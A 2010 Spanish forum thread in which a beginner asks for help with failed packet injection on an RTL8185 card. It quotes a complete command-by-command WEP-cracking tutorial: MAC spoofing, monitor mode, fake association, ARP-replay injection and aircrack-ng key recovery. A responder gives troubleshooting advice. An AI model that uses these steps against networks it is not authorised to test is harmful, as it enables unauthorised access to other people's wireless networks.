Título: ayuda! No puedo inyectar paquetes!! Publicado por: ivenancio en 27 Diciembre 2010, 02:53 am hola a todos.. mi problema es el siguiente.
tengo una tarjeta rtl8185 he leido mil veces el tutorial wifislax3.1 con rtl8185 54m consulte otras fuentes y corregi algunos problemas como cambiar el canal de el AP espesificar en RATE la conexcion en megas descarge un controlador diferente porque el que indican en el post que ya mencione no me funciono. Con el que descarge si se instalo el driver y si se cambio a modo minitor, solo que cuando indico la mac Falsa 11:22:33:44:55:66 y luego intento asociar la perp no pasa nada, luego cambio la mac por 00:11:22:33:44:55 y si crea la asociacion (me manda el mensaje "Association successful :-)" pero al tratar de inyectar paquetes no pasa nada quisiera que me pudieran orientar nose que debo hacer talvez pdrian decirme cuales son las posibles causas o que estoy haciendo mal. cabe mencionar que soy nuevo y hay muchas cosas que no entiendo. ojala que alguien me ayude y de antemano les doy las gracias y decir que este foro me ha ayudado a aprender lo poco que se son lo maximo ;-) Título: Re: ayuda! No puedo inyectar paquetes!! Publicado por: Belial & Grimoire en 27 Diciembre 2010, 06:29 am hola
creo que estas intentando hacer una auditoria.. mira, yo tengo una realtek pero de otra version parecida (rtl8187)... puede ser por varias cosas que te pasa eso, una vez eso me paso porque estaba muy lejos el modem al que intente auditar, tambien puede pasar que cuando vas a inyectar tienes que usar mon0 en vez de wlan0... en todo el inicio si es wlan0, pero solo cuando ya vas a empezar a inyectar para que te aparezca el mensaje "successfull" utiliza mon0 en todo lo demas, tambien tengo que decir que yo pude hacerlo mas facilmente con wifiway, pero eso es solo un consejo. espero esto te sirva sino mejor coloca algo mas especifico de lo que intentas hacer para ayudarte mejor salu2 Título: Re: ayuda! No puedo inyectar paquetes!! Publicado por: ivenancio en 29 Diciembre 2010, 02:35 am hola gracias por responder
basicamente la informacion sobre la cual ne estoy basando es esta: --------------------------------------------------------------------------------------------- COMPROBANDO LA SEGURIDAD DE NUESTRO RUTEADOR Utilizando la tarjeta de red RTL 8185 54M en modo monitor con la distribución de Linux wifislax 3.1, vamos a ver los pasos necesarios para asegurarnos de que tenemos seguro nuestro ruteador. 1.- DESCARGAMOS EL CONTROLADOR ADECUADO DESDE REALTEK: Esta se encuentra en la siguiente ruta: http://www.realtek.com.tw/downloads/downloadsView.aspx?Langid=1&PNid=1&PFid=1&Level=6&Conn=5&DownTypeID=3&GetDown=false&Downloads=true#RTL8185L Ahí puedes elegir cualquier servidor http://ftp://66.104.77.130/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz http://ftp://152.104.238.19/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz http://ftp://61.56.69.18/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz NOTA: Guardamos el archivo descargado en la usb para posteriormente copiarlo en wifislax 3.1 2.- UNA VEZ REALIZADA LA DESCARGA PROCEDEMOS A DESCOMPRIMIR Y COMPILAR #tar -xvf rtl8185_linux_26[1].1027.0823.2007.tar.gz #cd rtl8185_linux_26.1027.0823.2007 #./makedrv #./wlan0up 3.- AHORA PROBAMOS QUE REALMENTE YA ESTA LA TARJETA, SI ES EL CASO LO PONEMOS EN MODO MONITOR #iwconfig #ifconfig wlan0 down #ifconfig wlan0 hw ether 11:22:33:44:55:66 #modprobe -r ath_pci #modprobe ath_pci autocreate=monitor #iwconfig wlan0 mode monitor #iwconfig 4.- LO LEVANTAMOS #ifconfig wlan0 up 5.- VAMOS A IDENTIFICAR NUESTRO RUTEADOR #airodump-ng wlan0 Anotamos los datos mínimos necesarios tales como el ESSID,BSSID y MAC. Ahora nos ubicamos adecuadamente en nuestro caso en rate 1 y canal 6 #iwconfig wlan0 rate 1M channel 6 6.- INICIAMOS AIRMON Y VERIFICAMOS QUE YA TENEMOS NUESTRA INTERFACE EN MODO MONITOR #airmon-ng start wlan0 Vemos que nos da el siguiente resultado Interface Chipset Driver wlan0 RTL8187 r8187 (monitor mode enabled) 7.- EMPEZAMOS A CAPTURAR TRAFICO CON AIRODUMP #airodump-ng -w pas6 -c 6 wlan0 Seleccionamos el SSID (INFINITUMXXXX) y la direccion MAC(XX:XX:XX:XX:XX:XX) para verificar la seguridad de nuestro ruteador Dejamos abierta la ventana y en ejecucion airodump 8.- CREAMOS UNA ASOCIACION AP CON AIREPLAY-NG Abrimos un nuevo shell y tecleamos lo siguiente: #aireplay-ng -1 0 -e INFINITUMXXXX -a XX:XX.XX:XX:XX.XX -h 00:11:22:33:44:55 wlan0 En este punto vamos a intentarlo repetidamente hasta que obtengamos el mensaje: Association successful :-) 9.- AHORA INYECTAMOS TRAFICO CON AIREPLAY #aireplay-ng -3 -b XX:XX.XX:XX:XX.XX -h 00:11:22:33:44:55 wlan0 Vemos que se empiezan a enviar y recibir paquetes Y si checamos la ventana donde esta trabajando airodump se ve que se empiezan a generar los IV's, aqui esperamos hasta llegar unos 160,000 aproximandamente 10.- VAMOS A SACAR LA CLAVE CON AIRCRACK Revisamos que este el archivo .cap en la ruta actual #ls #cd rtl8185_linux_26.1027.0823.2007 (el mio se quedo aquí) #aircrack-ng pas6-01.cap Seleccionamos el router : 1 INFINITUMXXXX Y en unos instantes obtenemos el key: KEY FOUND [34:67:34:65:75] 11.- INTRODUCIMOS LA CLAVE A NUESTRA TARJETA Reiniciamos la PC, (porque despues aunque cambiemos el modo a managed no se conecta), volvemos a cargar los drivers (paso2) Lo levantamos por si acaso #ifconfi wlan0 up y checamos con: #iwconfig wlan0 Nos conectamos con nuestra clave (NO LA DEL VECINO) desde 1) wifislax-asistencia herramientas-wireless wifislax wireles Introducimos la interface: wlan0 el ssid:INFINITUMXXXX el canal:6 la clave:3467346575 2) wifislax-asistencia herramientas-wireless asistencia redes dhcp #ifconfig wlan0 13.- POR ULTIMO VERIFICAMOS CON PING Y A NAVEGAR EN INTERNET #ping www.google.com.mx ------------------------------------------------------------------------------------------- que tome de esta direccion http://foro.elhacker.net/wireless_en_linux/wifislax_31_con_rtl_8185_54m-t213096.0.html estoy casi seguro de que todo anda bien, en el paso No. 8 me manda el mensaje Association successful :-) pero en el No. 9 al escribir la orden no captura paquetes solo se queda en esto aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0 Saving ARP requests in replay_arp-0627-121526.cap You must also start airodump to capture replies. Read 2493 packets (got 0 ARP requests), sent 0 packets... read si aumenta pero no pasa na da mas ojala al guien puesda ayudarme gracias ..... Título: Re: ayuda! No puedo inyectar paquetes!! Publicado por: Belial & Grimoire en 29 Diciembre 2010, 18:19 pm hola
escribe en la consola iwconfig y ve si te aparece mon0 si te aparece entonces desde el punto No.8 en vez de escribir wlan0 escribe mon0 y ve que pasa si no se puede entonces dejalo como 30 min a ver si toma algo, si sigue sin moverse entonces la señal o esta muy lejos, tu señal es muy baja o deseguro esta suspendido el modem al que le haces la auditoria, a mi me ha pasado que me aparecen señales pero no puedo hacer nada porque los apagan, pero no totalmente salu2 Título: Re: ayuda! No puedo inyectar paquetes!! Publicado por: ivenancio en 30 Diciembre 2010, 03:31 am creo que probablemente sea que estoy muy lejos de el router ....
aunque intentare dejarlo mas tiempo. por ultimo, en algunos post he leido que los RTL8185 no son compatibles para inyeccion de trafico ¿es verdad? aunque el tutorial que publicaro se supone que esta probado y eso quiere decir que si es compatible.... bueno muchisimas gracias Belial & Grimoire por atender mis dudas un saludo a todos |